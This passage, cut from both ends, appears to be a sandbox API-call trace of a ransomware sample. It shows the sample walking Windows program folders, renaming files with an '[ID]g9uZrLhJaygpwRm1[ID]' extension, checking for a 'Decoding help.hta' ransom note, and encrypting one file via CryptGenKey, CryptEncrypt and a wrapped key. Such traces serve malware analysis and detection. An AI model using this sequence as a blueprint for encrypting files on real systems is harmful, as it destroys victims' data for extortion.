(x86)\\common files\\microsoft shared\\ink\\en-us\\decoding help.hta")) returned 0x1 [0059.423] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TipBand.dll.mui") returned -1 [0059.423] lstrlenW (lpString="TipBand.dll.mui") returned 15 [0059.423] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0059.423] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0059.423] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="TipBand.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui" [0059.423] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui" [0059.423] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0059.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.384] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x22e0fd30 | out: lpFindFileData=0x22e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll.mui", cAlternateFileName="")) returned 1 [0060.384] lstrcpyW (in: lpString1=0x2528fe40, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0060.384] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0060.384] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" [0060.384] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\decoding help.hta")) returned 0x1 [0060.384] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TipRes.dll.mui") returned -1 [0060.384] lstrlenW (lpString="TipRes.dll.mui") returned 14 [0060.384] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0060.384] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0060.384] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="TipRes.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" [0060.384] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" [0060.384] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.385] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x22e0fd30 | out: lpFindFileData=0x22e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 1 [0060.385] lstrcpyW (in: lpString1=0x2528fe40, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0060.385] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0060.385] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" [0060.385] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\decoding help.hta")) returned 0x1 [0060.385] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TipTsf.dll.mui") returned -1 [0060.385] lstrlenW (lpString="TipTsf.dll.mui") returned 14 [0060.385] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0060.385] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned 70 [0060.385] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\", lpString2="TipTsf.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" [0060.385] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" [0060.385] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.385] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.385] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x22e0fd30 | out: lpFindFileData=0x22e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 0 [0060.385] FindClose (in: hFindFile=0x5e3130 | out: hFindFile=0x5e3130) returned 1 Thread: id = 518 os_tid = 0xc5c [0047.405] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*.*", lpFindFileData=0x22f4fd30 | out: lpFindFileData=0x22f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa21d9876, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa060a95, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21d9876, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e27f0 [0049.321] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.322] FindNextFileW (in: hFindFile=0x5e27f0, lpFindFileData=0x22f4fd30 | out: lpFindFileData=0x22f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa21d9876, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa060a95, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21d9876, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.322] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.322] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.322] FindNextFileW (in: hFindFile=0x5e27f0, lpFindFileData=0x22f4fd30 | out: lpFindFileData=0x22f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa21d9876, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa060a95, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21d9876, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0049.322] FindClose (in: hFindFile=0x5e27f0 | out: hFindFile=0x5e27f0) returned 1 Thread: id = 519 os_tid = 0xc60 [0047.437] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*", lpFindFileData=0x2308fd30 | out: lpFindFileData=0x2308fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x227ce4d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x227ce4d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2b30 [0047.437] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.437] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x2308fd30 | out: lpFindFileData=0x2308fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x227ce4d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x227ce4d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.437] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.437] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.437] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x2308fd30 | out: lpFindFileData=0x2308fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x7e186d00, ftCreationTime.dwHighDateTime=0x1cfb543, ftLastAccessTime.dwLowDateTime=0x7e186d00, ftLastAccessTime.dwHighDateTime=0x1cfb543, ftLastWriteTime.dwLowDateTime=0x227ce4d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrSecUpd10111.msp.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="ADBERD~1._ID")) returned 1 [0047.438] lstrcpyW (in: lpString1=0x1151b328, lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*" [0047.438] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned 50 [0047.438] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" [0047.438] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\decoding help.hta")) returned 0x1 [0047.438] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AdbeRdrSecUpd10111.msp.[ID]g9uZrLhJaygpwRm1[ID]") returned 1 [0047.438] lstrlenW (lpString="AdbeRdrSecUpd10111.msp.[ID]g9uZrLhJaygpwRm1[ID]") returned 47 [0047.438] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0047.438] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x2308fd30 | out: lpFindFileData=0x2308fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4450880, ftCreationTime.dwHighDateTime=0x1cf6c45, ftLastAccessTime.dwLowDateTime=0xb4450880, ftLastAccessTime.dwHighDateTime=0x1cf6c45, ftLastWriteTime.dwLowDateTime=0xb4450880, ftLastWriteTime.dwHighDateTime=0x1cf6c45, nFileSizeHigh=0x0, nFileSizeLow=0x10e3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10110_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="ADBERD~2._ID")) returned 1 [0047.438] lstrcpyW (in: lpString1=0x1151b328, lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*" [0047.438] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned 50 [0047.438] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" [0047.438] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\decoding help.hta")) returned 0x1 [0047.438] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AdbeRdrUpd10110_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]") returned 1 [0047.438] lstrlenW (lpString="AdbeRdrUpd10110_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]") returned 48 [0047.438] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0047.438] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x2308fd30 | out: lpFindFileData=0x2308fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x2540cc00, ftLastWriteTime.dwHighDateTime=0x1d1056e, nFileSizeHigh=0x0, nFileSizeLow=0x109d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10116_MUI.msp", cAlternateFileName="ADBERD~3.MSP")) returned 1 [0047.439] lstrcpyW (in: lpString1=0x1151b328, lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*" [0047.439] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned 50 [0047.439] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" [0047.439] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\decoding help.hta")) returned 0x1 [0047.439] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AdbeRdrUpd10116_MUI.msp") returned 1 [0047.439] lstrlenW (lpString="AdbeRdrUpd10116_MUI.msp") returned 23 [0047.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*" [0047.439] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned 50 [0047.439] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="AdbeRdrUpd10116_MUI.msp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" [0047.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" [0047.439] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]" [0047.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0051.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x56c [0051.145] CreateFileMappingA (hFile=0x56c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c0 [0051.145] CryptAcquireContextA (in: phProv=0x2308fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2308fcec*=0x3449820) returned 1 [0054.701] CryptGenKey (in: hProv=0x3449820, Algid=0x6610, dwFlags=0x1, phKey=0x2308fce8 | out: phKey=0x2308fce8*=0x671330) returned 1 [0054.701] CryptExportKey (in: hKey=0x671330, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2308fbe4, pdwDataLen=0x2308fce4 | out: pbData=0x2308fbe4*, pdwDataLen=0x2308fce4*=0x2c) returned 1 [0054.701] MapViewOfFile (hFileMappingObject=0x4c0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x12de0000 [0054.711] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2308fbe4*, pdwDataLen=0x2308fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2308fbe4*, pdwDataLen=0x2308fcf8*=0x100) returned 1 [0054.711] CryptEncrypt (in: hKey=0x671330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x12de0000, pdwDataLen=0x2308fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x12de0000*, pdwDataLen=0x2308fce4*=0x100000) returned 1 [0054.869] UnmapViewOfFile (lpBaseAddress=0x12de0000) returned 1 [0054.880] CloseHandle (hObject=0x4c0) returned 1 [0054.880] CryptDestroyKey (hKey=0x671330) returned 1 [0054.880] CryptReleaseContext (hProv=0x3449820, dwFlags=0x0) returned 1 [0054.880] SetFilePointerEx (in: hFile=0x56c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.880] WriteFile (in: hFile=0x56c, lpBuffer=0x2308fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2308fcf8, lpOverlapped=0x0 | out: lpBuffer=0x2308fbe4*, lpNumberOfBytesWritten=0x2308fcf8*=0x100, lpOverlapped=0x0) returned 1 [0055.561] WriteFile (in: hFile=0x56c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2308fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x2308fcf8*=0x500, lpOverlapped=0x0) returned 1 [0055.561] CloseHandle (hObject=0x56c) returned 1 [0055.561] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.492] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x2308fd30 | out: lpFindFileData=0x2308fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x22782210, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x22782210, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22782210, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0058.493] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*" [0058.493] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned 50 [0058.493] lstrcatW (in: 